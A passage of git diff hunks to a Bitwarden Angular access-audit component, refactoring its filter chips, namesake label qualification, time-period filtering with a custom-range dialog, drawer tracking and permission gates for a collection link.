+        from: inverted ? null : this.rangeStart(),
+        to: inverted ? null : this.rangeEnd(),
+      }),
+    );
+  });
 
   async ngOnInit(): Promise<void> {
     await this.load();

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -93,36 +93,48 @@ const NO_CUSTOM_RANGE: CustomRangeDialogParams = { from: "", to: "" };
 
 const byLabel = (a: AuditChipOption, b: AuditChipOption) => a.label.localeCompare(b.label);
 
+/** One identity a chip can offer, before its label has been weighed against the other options'. */
+type AuditChipCandidate = { label: string; qualifier: string | null };
+
+/**
+ * Chip options for `candidates`, with a label two of them share qualified by whatever tells those two apart.
+ *
+ * The options are keyed on the identity rather than the label, but a menu offering the same words twice would
+ * still let an auditor read a filtered half of the trail as the whole of one identity's activity — the very
+ * outcome that keying was meant to prevent, arriving through the label instead. The qualifier is therefore
+ * appended in the `Name (qualifier)` shape the member pickers already use
+ * (`apps/web/src/app/admin-console/organizations/shared/components/access-selector/access-selector.models.ts`).
+ * Where the trail carries no qualifier for a namesake, the two stay indistinguishable.
+ */
+function qualifiedOptions(candidates: Map<string, AuditChipCandidate>): AuditChipOption[] {
+  const labelCounts = new Map<string, number>();
+  for (const { label } of candidates.values()) {
+    labelCounts.set(label, (labelCounts.get(label) ?? 0) + 1);
+  }
+  return [...candidates].map(([value, { label, qualifier }]) => ({
+    value,
+    label:
+      (labelCounts.get(label) ?? 0) > 1 && qualifier != null && qualifier !== label
+        ? `${label} (${qualifier})`
+        : label,
+  }));
+}
+
 /**
  * One chip option per distinct identity in `rows`, labelled the way the cells label it. A row whose identity
- * resolved to neither a name nor an email is skipped rather than offered under its raw id.
- *
- * Two members can share a display name, and a menu offering the same words twice would let an auditor read a
- * filtered half of the trail as the whole of one person's activity. A shared label is therefore qualified with
- * the identity's email, in the `Name (email)` shape the member pickers already use
- * (`apps/web/src/app/admin-console/organizations/shared/components/access-selector/access-selector.models.ts`).
- * Where the trail carries no email for a namesake, the two stay indistinguishable.
+ * resolved to neither a name nor an email is skipped rather than offered under its raw id. Two members can
+ * share a display name, so the identity's email qualifies a shared one (see {@link qualifiedOptions}).
  */
 function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): AuditChipOption[] {
-  const identities = new Map<string, { label: string; email: string | null }>();
+  const identities = new Map<string, AuditChipCandidate>();
   for (const row of rows) {
     const value = row[`${identity}Id`];
     const label = row[identity];
     if (value != null && label != null && !identities.has(value)) {
-      identities.set(value, { label, email: row[`${identity}Email`] });
+      identities.set(value, { label, qualifier: row[`${identity}Email`] });
     }
   }
-  const labelCounts = new Map<string, number>();
-  for (const { label } of identities.values()) {
-    labelCounts.set(label, (labelCounts.get(label) ?? 0) + 1);
-  }
-  return [...identities].map(([value, { label, email }]) => ({
-    value,
-    label:
-      (labelCounts.get(label) ?? 0) > 1 && email != null && email !== label
-        ? `${label} (${email})`
-        : label,
-  }));
+  return qualifiedOptions(identities);
 }
 
 /**
@@ -310,18 +322,20 @@ export class AccessAuditComponent implements OnInit {
   /**
    * One option per item the trail names, labelled the way the Item cell labels it. Rows whose cell renders
    * an em dash — no cipher this viewer could decrypt and no rule — contribute nothing, so the menu never
-   * offers an option that would narrow the table to rows showing no item.
+   * offers an option that would narrow the table to rows showing no item. Two items sharing a name are told
+   * apart by the collection the Item cell already carries as that name's tooltip (see
+   * {@link qualifiedOptions}); an access rule has no such qualifier, so namesake rules stay alike.
    */
   protected readonly itemOptions = computed<AuditChipOption[]>(() => {
-    const items = new Map<string, string>();
+    const items = new Map<string, AuditChipCandidate>();
     for (const row of this.rows()) {
       const value = auditItemId(row);
       const label = auditItemLabel(row);
       if (value != null && label != null && !items.has(value)) {
-        items.set(value, label);
+        items.set(value, { label, qualifier: row.cipherName != null ? row.collectionName : null });
       }
     }
-    return [...items].map(([value, label]) => ({ value, label })).sort(byLabel);
+    return qualifiedOptions(items).sort(byLabel);
   });
 
   /** A multi-select chip's selection, or null when it has none — which matches every row. */

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -227,6 +227,21 @@ export class AccessAuditComponent implements OnInit {
     { initialValue: false },
   );
 
+  /**
+   * Gates the drawer's collection link, which lands on the organization vault narrowed to that one
+   * collection. That route is guarded by `canAccessVaultTab`, which reads `canViewAllCollections` —
+   * neither implied by this page's own `canAccessEventLogs`, so a custom auditor holding the events
+   * permission alone would follow the link into an "Access denied" bounce.
+   */
+  private readonly canViewCollections = toSignal(
+    this.activeUserId$.pipe(
+      switchMap((userId) => this.organizationService.organizations$(userId)),
+      getById(this.organizationId()),
+      map((organization) => organization?.canViewAllCollections ?? false),
+    ),
+    { initialValue: false },
+  );
+
   protected readonly status = signal<AuditStatus>("loading");
   protected readonly rows = signal<AuditRow[]>([]);
 
@@ -588,6 +603,9 @@ export class AccessAuditComponent implements OnInit {
    * under it links — the member lookup ran once for the whole trail, and a second answer could
    * disagree with the first. An automated row has no actor to resolve: its cell reads "System",
    * which is a value, not a member.
+   *
+   * The two permissions travel with the data for the same reason: this page already reads the viewer's
+   * membership once, and a drawer re-deriving them could offer a link the page would not.
    */
   protected openDetails(row: AuditRow): void {
     void AuditEventDrawerComponent.open(this.dialogService, {
@@ -596,6 +614,8 @@ export class AccessAuditComponent implements OnInit {
         organizationId: this.organizationId(),
         actor: row.automated ? null : this.linkedMember(row.actorId, row.actor),
         requester: this.linkedMember(row.requesterId, row.requester),
+        canManageAccessRules: this.canManageAccessRules(),
+        canViewCollections: this.canViewCollections(),
       },
     });
   }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -35,7 +35,6 @@ import {
   LinkModule,
   StatusLockupComponent,
   SvgComponent,
-  SearchModule,
   TableModule,
   TooltipDirective,
 } from "@bitwarden/components";
@@ -108,7 +107,7 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  * Read-only, and deliberately without a drill-down: the request-detail page is authorized for the
  * request's requester or a managing approver, which is a different permission from the one that opens
  * this trail, so an auditor holding only AccessEventLogs would follow such a link into a 404. The
- * toolbar filters (free text, event kind, actor, requester, date range) run client-side over the
+ * toolbar filters (event kind, actor, requester, date range) run client-side over the
  * already-fetched window: the endpoint takes no query parameters and returns the whole 90 days at once,
  * so changing a filter never re-reads it.
  */
@@ -132,7 +131,6 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
     LinkModule,
     StatusLockupComponent,
     SvgComponent,
-    SearchModule,
     TableModule,
     TooltipDirective,
     I18nPipe,
@@ -179,13 +177,10 @@ export class AccessAuditComponent implements OnInit {
   protected readonly status = signal<AuditStatus>("loading");
   protected readonly rows = signal<AuditRow[]>([]);
 
-  protected readonly searchControl = new FormControl("", { nonNullable: true });
   protected readonly actorControl = new FormControl<string | null>(null);
   protected readonly requesterControl = new FormControl<string | null>(null);
   protected readonly fromControl = new FormControl("", { nonNullable: true });
   protected readonly toControl = new FormControl("", { nonNullable: true });
-
-  private readonly searchText = toSignal(this.searchControl.valueChanges, { initialValue: "" });
 
   /**
    * The Event chip. `bit-filter-menu` is not a `ControlValueAccessor` — it owns its selection and
@@ -195,7 +190,6 @@ export class AccessAuditComponent implements OnInit {
   private readonly kindMenu = viewChild(FilterMenuComponent);
 
   private readonly kindValue = computed(() => (this.kindMenu()?.value() ?? null) as string | null);
-
   private readonly actorValue = toSignal(this.actorControl.valueChanges, { initialValue: null });
   private readonly requesterValue = toSignal(this.requesterControl.valueChanges, {
     initialValue: null,
@@ -250,7 +244,6 @@ export class AccessAuditComponent implements OnInit {
   protected readonly filteredRows = computed(() => {
     const inverted = this.invertedRange();
     const filter: AuditFilter = {
-      text: this.searchText(),
       kindLabelKey: this.kindValue(),
       actorId: this.actorValue(),
       requesterId: this.requesterValue(),

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -173,7 +173,6 @@ export class AccessAuditComponent implements OnInit {
   protected readonly status = signal<AuditStatus>("loading");
   protected readonly rows = signal<AuditRow[]>([]);
 
-  // --- Toolbar filters (client-side over the fetched window) ---
   protected readonly searchControl = new FormControl("", { nonNullable: true });
   protected readonly actorControl = new FormControl<string | null>(null);
   protected readonly requesterControl = new FormControl<string | null>(null);
@@ -220,14 +219,12 @@ export class AccessAuditComponent implements OnInit {
       ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
       : null;
 
-  /** Event-kind chip options, limited to the labels actually present in the trail, sorted. */
   protected readonly kindOptions = computed(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
       .map((labelKey) => ({ label: this.i18nService.t(labelKey), value: labelKey }))
       .sort(byLabel),
   );
 
-  /** Actor chip options: the identities that actually acted, plus the system bucket when the trail has one. */
   protected readonly actorOptions = computed<ChipFilterOption<string>[]>(() => {
     const rows = this.rows();
     const options = identityOptions(
@@ -240,7 +237,6 @@ export class AccessAuditComponent implements OnInit {
     return options.sort(byLabel);
   });
 
-  /** Requester chip options: the identities whose access the trail records. */
   protected readonly requesterOptions = computed<ChipFilterOption<string>[]>(() =>
     identityOptions(this.rows(), "requester").sort(byLabel),
   );

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -643,6 +643,7 @@ export class AccessAuditComponent implements OnInit {
    */
   private async showDetails(row: AuditRow): Promise<void> {
     const drawer = await AuditEventDrawerComponent.open(this.dialogService, {
+      closeOnNavigation: true,
       data: {
         row,
         organizationId: this.organizationId(),

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -2,6 +2,7 @@ import { CommonModule } from "@angular/common";
 import {
   ChangeDetectionStrategy,
   Component,
+  DestroyRef,
   OnInit,
   computed,
   effect,
@@ -10,7 +11,7 @@ import {
   untracked,
   viewChild,
 } from "@angular/core";
-import { toSignal } from "@angular/core/rxjs-interop";
+import { takeUntilDestroyed, toSignal } from "@angular/core/rxjs-interop";
 import { ActivatedRoute, RouterLink } from "@angular/router";
 import { firstValueFrom, map, switchMap } from "rxjs";
 
@@ -30,6 +31,7 @@ import {
   ButtonModule,
   CalloutModule,
   DialogService,
+  DrawerRef,
   FILTER_CONTROL,
   FilterControl,
   FilterMenuModule,
@@ -201,6 +203,7 @@ export class AccessAuditComponent implements OnInit {
   private readonly organizationUserApiService = inject(OrganizationUserApiService);
   private readonly userNamePipe = inject(UserNamePipe);
   private readonly dialogService = inject(DialogService);
+  private readonly destroyRef = inject(DestroyRef);
 
   /**
    * The organization whose trail to show, from the route. `requireSync` holds because `params` emits
@@ -244,6 +247,25 @@ export class AccessAuditComponent implements OnInit {
 
   protected readonly status = signal<AuditStatus>("loading");
   protected readonly rows = signal<AuditRow[]>([]);
+
+  /**
+   * The open details drawer, or null when none is open. Held as the ref rather than a bare flag so a
+   * ref closing late — the drawer being replaced by activating a second row, which closes the first
+   * one on the way — cannot report the newer drawer as closed.
+   */
+  private readonly detailsDrawer = signal<DrawerRef<unknown, AuditEventDrawerComponent> | null>(
+    null,
+  );
+
+  /**
+   * Whether the drawer is over the table, which is what drops Actor, Requester and Duration from it.
+   *
+   * Driven by the drawer's own state rather than a viewport breakpoint. What narrows the table is the
+   * drawer taking its own grid column beside it, which a media query cannot see: a wide window with no
+   * drawer would lose columns it has room for, and a window narrow enough for the drawer to overlay
+   * rather than push would lose them while nothing was covering the table at all.
+   */
+  protected readonly detailsOpen = computed(() => this.detailsDrawer() != null);
 
   /**
    * The organization's members, keyed by PLATFORM user id — the id an audit row carries. The entity-events
@@ -608,7 +630,21 @@ export class AccessAuditComponent implements OnInit {
    * membership once, and a drawer re-deriving them could offer a link the page would not.
    */
   protected openDetails(row: AuditRow): void {
-    void AuditEventDrawerComponent.open(this.dialogService, {
+    void this.showDetails(row);
+  }
+
+  /**
+   * Opens the pane and tracks it for as long as it is open.
+   *
+   * A drawer has no backdrop to dismiss — it occupies its own column beside the table rather than
+   * covering the page — so every way out of one ends in `DrawerRef.close()` or `_forceClose()`, and
+   * both emit on `closed`: the X button, Escape, a route change under `closeOnNavigation`, and
+   * `openDrawer` itself tearing the stack down when a second row is activated. Subscribing to that one
+   * observable therefore covers every route, including the replacement, where the outgoing ref emits
+   * before this call has the incoming one.
+   */
+  private async showDetails(row: AuditRow): Promise<void> {
+    const drawer = await AuditEventDrawerComponent.open(this.dialogService, {
       data: {
         row,
         organizationId: this.organizationId(),
@@ -618,6 +654,13 @@ export class AccessAuditComponent implements OnInit {
         canViewCollections: this.canViewCollections(),
       },
     });
+    if (drawer == null) {
+      return;
+    }
+    drawer.closed.pipe(takeUntilDestroyed(this.destroyRef)).subscribe(() => {
+      this.detailsDrawer.update((open) => (open === drawer ? null : open));
+    });
+    this.detailsDrawer.set(drawer);
   }
 
   /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -43,6 +43,7 @@ import { AccessNameResolverService } from "../access-requests/access-name-resolv
 
 import {
   AUTOMATED_ACTOR,
+  AuditFilter,
   AuditRow,
   auditRangeEnd,
   auditRangeStart,
@@ -53,24 +54,24 @@ import { AuditApiService } from "./audit-api.service";
 
 type AuditStatus = "loading" | "ready" | "empty" | "error";
 
+type AuditChipOption = { label: string; value: string };
+
+const byLabel = (a: AuditChipOption, b: AuditChipOption) => a.label.localeCompare(b.label);
+
 /**
  * One chip option per distinct identity in `rows`, labelled the way the cells label it. A row whose identity
  * resolved to neither a name nor an email is skipped rather than offered under its raw id.
  */
-function identityOptions(
-  rows: AuditRow[],
-  id: (row: AuditRow) => string | null,
-  label: (row: AuditRow) => string | null,
-): ChipFilterOption<string>[] {
+function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): AuditChipOption[] {
   const labelById = new Map<string, string>();
   for (const row of rows) {
-    const value = id(row);
-    const text = label(row);
-    if (value != null && text != null && !labelById.has(value)) {
-      labelById.set(value, text);
+    const value = row[`${identity}Id`];
+    const label = row[identity];
+    if (value != null && label != null && !labelById.has(value)) {
+      labelById.set(value, label);
     }
   }
-  return [...labelById].map(([value, text]) => ({ label: text, value }));
+  return [...labelById].map(([value, label]) => ({ label, value }));
 }
 
 /**
@@ -200,7 +201,7 @@ export class AccessAuditComponent implements OnInit {
   protected readonly kindOptions = computed(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
       .map((labelKey) => ({ label: this.i18nService.t(labelKey), value: labelKey }))
-      .sort((a, b) => a.label.localeCompare(b.label)),
+      .sort(byLabel),
   );
 
   /** Actor chip options: the identities that actually acted, plus the system bucket when the trail has one. */
@@ -208,36 +209,30 @@ export class AccessAuditComponent implements OnInit {
     const rows = this.rows();
     const options = identityOptions(
       rows.filter((row) => !row.automated),
-      (row) => row.actorId,
-      (row) => row.actor,
+      "actor",
     );
     if (rows.some((row) => row.automated)) {
       options.push({ label: this.i18nService.t("pamAuditSystem"), value: AUTOMATED_ACTOR });
     }
-    return options.sort((a, b) => a.label.localeCompare(b.label));
+    return options.sort(byLabel);
   });
 
   /** Requester chip options: the identities whose access the trail records. */
   protected readonly requesterOptions = computed<ChipFilterOption<string>[]>(() =>
-    identityOptions(
-      this.rows(),
-      (row) => row.requesterId,
-      (row) => row.requester,
-    ).sort((a, b) => a.label.localeCompare(b.label)),
+    identityOptions(this.rows(), "requester").sort(byLabel),
   );
 
   protected readonly filteredRows = computed(() => {
     const inverted = this.invertedRange();
-    return this.rows().filter((row) =>
-      auditRowMatchesFilter(row, {
-        text: this.searchText(),
-        kindLabelKey: this.kindValue(),
-        actorId: this.actorValue(),
-        requesterId: this.requesterValue(),
-        from: inverted ? null : this.rangeStart(),
-        to: inverted ? null : this.rangeEnd(),
-      }),
-    );
+    const filter: AuditFilter = {
+      text: this.searchText(),
+      kindLabelKey: this.kindValue(),
+      actorId: this.actorValue(),
+      requesterId: this.requesterValue(),
+      from: inverted ? null : this.rangeStart(),
+      to: inverted ? null : this.rangeEnd(),
+    };
+    return this.rows().filter((row) => auditRowMatchesFilter(row, filter));
   });
 
   async ngOnInit(): Promise<void> {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -7,12 +7,12 @@ import {
   effect,
   inject,
   signal,
-  viewChildren,
+  untracked,
+  viewChild,
 } from "@angular/core";
 import { toSignal } from "@angular/core/rxjs-interop";
-import { FormControl, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
 import { ActivatedRoute, RouterLink } from "@angular/router";
-import { map, switchMap } from "rxjs";
+import { firstValueFrom, map, switchMap } from "rxjs";
 
 import { OrganizationUserApiService } from "@bitwarden/admin-console/common";
 import { UserNamePipe } from "@bitwarden/angular/pipes/user-name.pipe";
@@ -31,8 +31,8 @@ import {
   CalloutModule,
   DialogService,
   FILTER_CONTROL,
+  FilterControl,
   FilterMenuModule,
-  FormFieldModule,
   LinkModule,
   StatusLockupComponent,
   SvgComponent,
@@ -50,9 +50,15 @@ import { HeaderModule } from "@bitwarden/web-vault/app/layouts/header/header.mod
 import { AccessNameResolverService } from "../access-requests/access-name-resolver.service";
 
 import {
+  AUDIT_TIME_PERIOD_LABEL_KEYS,
+  AUDIT_TIME_PRESETS,
   AUTOMATED_ACTOR,
   AuditFilter,
+  AuditRange,
   AuditRow,
+  AuditTimePeriod,
+  UNBOUNDED_AUDIT_RANGE,
+  auditPresetRange,
   auditRangeEnd,
   auditRangeStart,
   auditRowMatchesFilter,
@@ -60,6 +66,10 @@ import {
 } from "./access-audit-row";
 import { AuditApiService } from "./audit-api.service";
 import { AuditExportService } from "./audit-export.service";
+import {
+  CustomRangeDialogComponent,
+  CustomRangeDialogParams,
+} from "./custom-range-dialog/custom-range-dialog.component";
 
 type AuditStatus = "loading" | "ready" | "empty" | "error";
 
@@ -73,7 +83,10 @@ const FILTER_KEYS = {
   kind: "kind",
   actor: "actor",
   requester: "requester",
+  timePeriod: "timePeriod",
 } as const;
+
+const NO_CUSTOM_RANGE: CustomRangeDialogParams = { from: "", to: "" };
 
 const byLabel = (a: AuditChipOption, b: AuditChipOption) => a.label.localeCompare(b.label);
 
@@ -127,10 +140,12 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
  * permission that authorized this page — an actor, a requester or a cipher, never an access rule, which
  * has no such dialog.
  *
- * The toolbar filters (event kind, actor, requester, date range) run client-side over the already-fetched
+ * The toolbar filters (event kind, actor, requester, time period) run client-side over the already-fetched
  * window: the endpoint takes no query parameters and returns the whole 90 days at once, so changing a
  * filter never re-reads it. Update is therefore not "apply these filters" as it is on the organization
  * event log — those are already live — but the only way to pull in events recorded since the page opened.
+ * For the same reason the time period's "All time" means the whole fetched trail, which is those 90 days
+ * and no more; nothing on this page claims to reach further back.
  */
 @Component({
   selector: "app-pam-access-audit",
@@ -138,14 +153,12 @@ function identityOptions(rows: AuditRow[], identity: "actor" | "requester"): Aud
   changeDetection: ChangeDetectionStrategy.OnPush,
   imports: [
     CommonModule,
-    ReactiveFormsModule,
     RouterLink,
     AsyncActionsModule,
     BadgeModule,
     ButtonModule,
     CalloutModule,
     FilterMenuModule,
-    FormFieldModule,
     HeaderModule,
     LinkModule,
     StatusLockupComponent,
@@ -211,38 +224,51 @@ export class AccessAuditComponent implements OnInit {
 
   /**
    * The filter chips, which own their own selections. Read through the {@link FilterControl} contract
-   * rather than a host bridge: this page is not a filterable surface with rows to facet, it is a few
+   * rather than a host bridge: this page is not a filterable surface with rows to facet, it is four
    * independent chips over one already-fetched array.
+   *
+   * Located by template reference rather than by matching `key()`, and only `value`, `active` and
+   * `setValue` are ever read. `key` is a required input, and the Export button's disabled state reads the
+   * filtered rows from above the chip row — one binding before Angular has set those inputs, which reading
+   * `key()` there would answer with NG0950.
    */
-  private readonly filterControls = viewChildren(FILTER_CONTROL);
+  private readonly kindChip = viewChild("kindFilter", { read: FILTER_CONTROL });
+  private readonly actorChip = viewChild("actorFilter", { read: FILTER_CONTROL });
+  private readonly requesterChip = viewChild("requesterFilter", { read: FILTER_CONTROL });
+  private readonly timePeriodChip = viewChild("timePeriodFilter", { read: FILTER_CONTROL });
 
-  protected readonly fromControl = new FormControl("", { nonNullable: true });
-  protected readonly toControl = new FormControl("", { nonNullable: true });
-
-  private readonly fromValue = toSignal(this.fromControl.valueChanges, { initialValue: "" });
-  private readonly toValue = toSignal(this.toControl.valueChanges, { initialValue: "" });
-
-  private readonly rangeStart = computed(() => auditRangeStart(this.fromValue()));
-  private readonly rangeEnd = computed(() => auditRangeEnd(this.toValue()));
-
-  /** From after To. Surfaced to the auditor, who otherwise reads an empty table as a trail with no events. */
-  protected readonly invertedRange = computed(() => {
-    const start = this.rangeStart();
-    const end = this.rangeEnd();
-    return start != null && end != null && end.getTime() < start.getTime();
-  });
+  private readonly chips = computed(() =>
+    [this.kindChip(), this.actorChip(), this.requesterChip(), this.timePeriodChip()].filter(
+      (chip): chip is FilterControl => chip != null,
+    ),
+  );
 
   /**
-   * The inverted range as the To control's own error, so the field carries the danger border, `aria-invalid`
-   * and the message that `bit-form-field` already renders for a control in error.
-   *
-   * A validator rather than a `setErrors` call: `setUpControl` re-validates the control whenever the ready
-   * branch is created, which would wipe an imperatively set error.
+   * The bounds the table is narrowed to. Stamped when a period is chosen rather than recomputed on every
+   * filter pass, so "Past 7 days" does not slide forward under a table the auditor is still reading, and
+   * so nothing in the row predicate consults the clock.
    */
-  private readonly invertedRangeValidator: ValidatorFn = () =>
-    this.invertedRange()
-      ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
-      : null;
+  private readonly range = signal<AuditRange>(UNBOUNDED_AUDIT_RANGE);
+
+  /** The period whose bounds {@link range} holds. A cancelled dialog rolls the chip back to this. */
+  private readonly appliedPeriod = signal<AuditTimePeriod | null>(null);
+
+  /** The last chip selection {@link applyTimePeriod} was run for, so a rollback does not re-enter it. */
+  private readonly handledPeriod = signal<AuditTimePeriod | null>(null);
+
+  /** The custom bounds last confirmed, kept so reopening the dialog shows the range in force. */
+  private readonly customRange = signal<CustomRangeDialogParams>(NO_CUSTOM_RANGE);
+
+  /**
+   * The Time period options. "All time" is the chip's own reset row rather than a fifth option, so the
+   * menu offers one way to mean "no bounds" instead of two that read differently.
+   */
+  protected readonly timePresets = AUDIT_TIME_PRESETS.map((period) => ({
+    value: period,
+    label: this.i18nService.t(AUDIT_TIME_PERIOD_LABEL_KEYS[period]),
+  }));
+
+  protected readonly customPeriodLabel = this.i18nService.t(AUDIT_TIME_PERIOD_LABEL_KEYS.custom);
 
   protected readonly kindOptions = computed<AuditChipOption[]>(() =>
     [...new Set(this.rows().map((row) => row.kindLabelKey))]
@@ -267,40 +293,91 @@ export class AccessAuditComponent implements OnInit {
   );
 
   /** One chip's selection, or null when that chip has none. Single-select, so the value is a scalar. */
-  private selectedValue(key: string): string | null {
-    const control = this.filterControls().find((candidate) => candidate.key() === key);
-    const value = control?.value();
+  private selectedValue(chip: FilterControl | undefined): string | null {
+    const value = chip?.value();
     return typeof value === "string" ? value : null;
   }
 
+  private readonly selectedPeriod = computed<AuditTimePeriod | null>(
+    () => this.selectedValue(this.timePeriodChip()) as AuditTimePeriod | null,
+  );
+
   protected readonly filteredRows = computed(() => {
-    const inverted = this.invertedRange();
+    const { from, to } = this.range();
     const filter: AuditFilter = {
-      kindLabelKey: this.selectedValue(FILTER_KEYS.kind),
-      actorId: this.selectedValue(FILTER_KEYS.actor),
-      requesterId: this.selectedValue(FILTER_KEYS.requester),
-      from: inverted ? null : this.rangeStart(),
-      to: inverted ? null : this.rangeEnd(),
+      kindLabelKey: this.selectedValue(this.kindChip()),
+      actorId: this.selectedValue(this.actorChip()),
+      requesterId: this.selectedValue(this.requesterChip()),
+      from,
+      to,
     };
     return this.rows().filter((row) => auditRowMatchesFilter(row, filter));
   });
 
-  constructor() {
-    this.toControl.addValidators(this.invertedRangeValidator);
+  /** Whether anything is narrowing the table, which is what puts "Clear all" at the end of the chip row. */
+  protected readonly filtersActive = computed(() => this.chips().some((chip) => chip.active()));
 
-    // Editing From leaves To's value alone, so nothing else would re-run a cross-field rule. The control is
-    // marked touched on every inverted edit rather than only when the range flips, because
-    // `BitInputDirective.onInput` marks it untouched on each keystroke and
-    // `BitFormFieldControlDirective.hasError` paints nothing on an untouched control — the message would
-    // otherwise blink out mid-edit and stay hidden until the next blur.
+  constructor() {
+    // A `bit-filter-menu` has no value output to subscribe to, so the chip's own selection signal is what
+    // drives the range. Guarded on the last handled selection because rolling the chip back after a
+    // cancelled dialog writes to that same signal.
     effect(() => {
-      this.fromValue();
-      this.toValue();
-      this.toControl.updateValueAndValidity();
-      if (this.invertedRange()) {
-        this.toControl.markAsTouched();
-      }
+      const period = this.selectedPeriod();
+      untracked(() => {
+        if (period === this.handledPeriod()) {
+          return;
+        }
+        this.handledPeriod.set(period);
+        void this.applyTimePeriod(period);
+      });
     });
+  }
+
+  /** Narrows the table to a chosen period, or collects bounds in the dialog when that period is Custom. */
+  private async applyTimePeriod(period: AuditTimePeriod | null): Promise<void> {
+    if (period === "custom") {
+      await this.openCustomRange();
+      return;
+    }
+    this.range.set(period == null ? UNBOUNDED_AUDIT_RANGE : auditPresetRange(period, new Date()));
+    this.appliedPeriod.set(period);
+  }
+
+  /**
+   * Collects custom bounds, applying them only on confirm.
+   *
+   * A cancelled dialog rolls the chip back to the period still in force, so it is never left reading
+   * "Custom" over a range that was never applied. The dialog blocks its own confirm on an inverted range,
+   * so a range that would hide every row cannot arrive here.
+   */
+  private async openCustomRange(): Promise<void> {
+    const result = await firstValueFrom(
+      CustomRangeDialogComponent.open(this.dialogService, { data: this.customRange() }).closed,
+    );
+    if (result == null) {
+      const previous = this.appliedPeriod();
+      this.handledPeriod.set(previous);
+      this.setPeriod(previous);
+      return;
+    }
+    this.customRange.set(result);
+    this.range.set({ from: auditRangeStart(result.from), to: auditRangeEnd(result.to) });
+    this.appliedPeriod.set("custom");
+  }
+
+  private setPeriod(period: AuditTimePeriod | null): void {
+    this.timePeriodChip()?.setValue(period);
+  }
+
+  /** Resets every chip, so an auditor who narrowed the trail four ways gets back to all of it in one click. */
+  protected clearAll(): void {
+    for (const chip of this.chips()) {
+      chip.setValue(null);
+    }
+    this.customRange.set(NO_CUSTOM_RANGE);
+    this.handledPeriod.set(null);
+    this.appliedPeriod.set(null);
+    this.range.set(UNBOUNDED_AUDIT_RANGE);
   }
 
   async ngOnInit(): Promise<void> {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -197,7 +197,7 @@ export class AccessAuditComponent implements OnInit {
   /**
    * The organization's members, keyed by PLATFORM user id — the id an audit row carries. The entity-events
    * dialog is keyed on the ORGANIZATION USER id instead, so an identity can only be linked once this map
-   * has bridged the two. Empty whenever {@link loadMembers} was refused.
+   * has bridged the two.
    */
   private readonly members = signal(new Map<string, ResolvedMember>());
   protected readonly actorControl = new FormControl<string | null>(null);
@@ -342,26 +342,21 @@ export class AccessAuditComponent implements OnInit {
   /**
    * The organization's members, keyed by platform user id, for {@link members}.
    *
-   * A refusal here is an ordinary outcome, not an error to surface: this page is authorized by
-   * AccessEventLogs alone, which does not imply permission to enumerate the organization's members. The
-   * lookup therefore resolves to an empty map rather than rejecting, leaving every identity unlinked and
-   * the trail itself intact — an auditor who cannot enumerate members still reads the whole trail.
+   * `mini-details` is authorized for any member of the organization, which reaching this page already
+   * requires, so a failure here is a failed read rather than a permission this auditor lacks. It reaches
+   * {@link load} with the trail's own failures instead of being swallowed into an empty map.
    */
   private async loadMembers(): Promise<Map<string, ResolvedMember>> {
     const members = new Map<string, ResolvedMember>();
-    try {
-      const response = await this.organizationUserApiService.getAllMiniUserDetails(
-        this.organizationId(),
-      );
-      for (const user of response.data) {
-        members.set(user.userId, {
-          name: this.userNamePipe.transform(user),
-          email: user.email,
-          organizationUserId: user.id,
-        });
-      }
-    } catch (e) {
-      this.logService.error(e);
+    const response = await this.organizationUserApiService.getAllMiniUserDetails(
+      this.organizationId(),
+    );
+    for (const user of response.data) {
+      members.set(user.userId, {
+        name: this.userNamePipe.transform(user),
+        email: user.email,
+        organizationUserId: user.id,
+      });
     }
     return members;
   }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.ts
@@ -7,7 +7,7 @@ import {
   effect,
   inject,
   signal,
-  viewChild,
+  viewChildren,
 } from "@angular/core";
 import { toSignal } from "@angular/core/rxjs-interop";
 import { FormControl, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
@@ -29,11 +29,9 @@ import {
   BadgeModule,
   ButtonModule,
   CalloutModule,
-  ChipFilterComponent,
-  ChipFilterOption,
   DialogService,
-  FilterMenuComponent,
-  FilterOptionComponent,
+  FILTER_CONTROL,
+  FilterMenuModule,
   FormFieldModule,
   LinkModule,
   StatusLockupComponent,
@@ -66,6 +64,16 @@ import { AuditExportService } from "./audit-export.service";
 type AuditStatus = "loading" | "ready" | "empty" | "error";
 
 type AuditChipOption = { label: string; value: string };
+
+/**
+ * The chips' keys. A `bit-filter-menu` owns its own selection and reports it under its key rather than
